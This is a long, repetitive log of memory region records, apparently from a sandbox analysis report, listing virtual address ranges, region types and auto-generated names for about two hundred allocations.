Region: id = 1739 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1740 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1741 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1742 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1743 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1744 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1745 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1746 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1747 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1748 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1749 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1750 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1751 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1752 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1753 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1754 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1755 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1756 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1757 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1758 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1759 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1760 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1761 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1762 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1763 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1764 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1765 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1766 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1767 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1768 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1769 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1770 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1771 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1772 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1773 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1774 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1775 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1776 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1777 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1778 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1779 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1780 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1781 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1782 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1783 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1784 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1785 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1786 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1787 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1788 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1789 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1790 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1791 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1792 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1793 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1794 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1795 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1796 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1797 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1798 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1799 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1800 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1801 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1802 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1803 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1804 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1805 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1806 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1807 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1808 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1809 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1810 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1811 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1812 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1813 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1814 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1815 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1816 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1817 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1818 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1819 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1820 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1821 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1822 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1823 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1824 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1825 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1826 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1827 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1828 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1829 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1830 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1831 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1832 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1833 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1834 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1835 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1836 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1837 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1838 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1839 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1840 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1841 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1842 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1843 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1844 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1845 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1846 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1847 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1848 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1849 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1850 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1851 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1852 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1853 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1854 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1855 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1856 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1857 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1858 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1859 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1860 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1861 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1862 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1863 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1864 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1865 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1866 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1867 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1868 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1869 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1870 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1871 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1872 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1873 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1874 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1875 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1876 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1877 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1878 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1879 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1880 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1881 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1882 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1883 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1884 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1885 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1886 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1887 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1888 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1889 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1890 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1891 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1892 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1893 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1894 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1895 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1896 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1897 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1898 start_va = 0xc2e0000 end_va = 0xc7d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c2e0000" filename = "" Region: id = 1899 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1900 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1901 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1902 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1903 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1904 start_va = 0x117e0000 end_va = 0x11cd1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000117e0000" filename = "" Region: id = 1905 start_va = 0x460000 end_va = 0x47bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1906 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1907 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1908 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1909 start_va = 0x460000 end_va = 0x47bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1910 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1911 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1912 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1913 start_va = 0x460000 end_va = 0x47bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1914 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1915 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1916 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1917 start_va = 0x460000 end_va = 0x47bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1918 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1919 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1920 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1921 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1922 start_va = 0x460000 end_va = 0x47bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1923 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1924 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1925 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1926 start_va = 0x460000 end_va = 0x47bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1927 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1928 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1929 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1930 start_va = 0x460000 end_va = 0x47bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1931 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1932 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1933 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1934 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1935 start_va = 0x460000 end_va = 0x47bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1936 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" 